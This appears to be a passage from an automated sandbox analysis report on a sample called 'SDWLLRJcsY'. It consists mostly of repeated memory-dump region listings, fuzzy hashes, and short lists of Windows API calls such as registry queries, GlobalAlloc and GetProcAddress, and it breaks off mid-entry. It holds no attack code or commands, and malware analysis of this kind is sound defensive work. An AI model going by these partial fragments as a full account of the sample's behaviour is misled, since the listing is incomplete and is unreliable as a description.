                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                      • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                      • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                      • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                      • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                      • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                      • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                      APIs
                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree
                                      • String ID: Noncyclical
                                      • API String ID: 3394109436-2594171315
                                      • Opcode ID: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                      • Instruction ID: dcb5b8d847a710274197b3f9eb455299827833f010be51817d6ecb77aa41e574
                                      • Opcode Fuzzy Hash: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                      • Instruction Fuzzy Hash: 5021CD72700100EFDB20EBA8CE8495E76B8AF84328725417BF902F72D1DB7D98518B2D
                                      APIs
                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                      • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Enum$CloseValue
                                      • String ID:
                                      • API String ID: 397863658-0
                                      • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                      • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                      • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                      • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                      APIs
                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                      • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID:
                                      • API String ID: 3356406503-0
                                      • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                      • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                      • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                      • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                      • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                      • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                      • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                      APIs
                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseDeleteValue
                                      • String ID:
                                      • API String ID: 2831762973-0
                                      • Opcode ID: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                      • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                      • Opcode Fuzzy Hash: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                      • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00405393
                                        • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 004053DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: InitializeMessageSendUninitialize
                                      • String ID:
                                      • API String ID: 2896919175-0
                                      • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                      • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                      • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                      • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                      APIs
                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$EnableShow
                                      • String ID:
                                      • API String ID: 1136574915-0
                                      • Opcode ID: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                      • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                      • Opcode Fuzzy Hash: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                      • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                      • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                      • Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                      • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                        • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                        • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
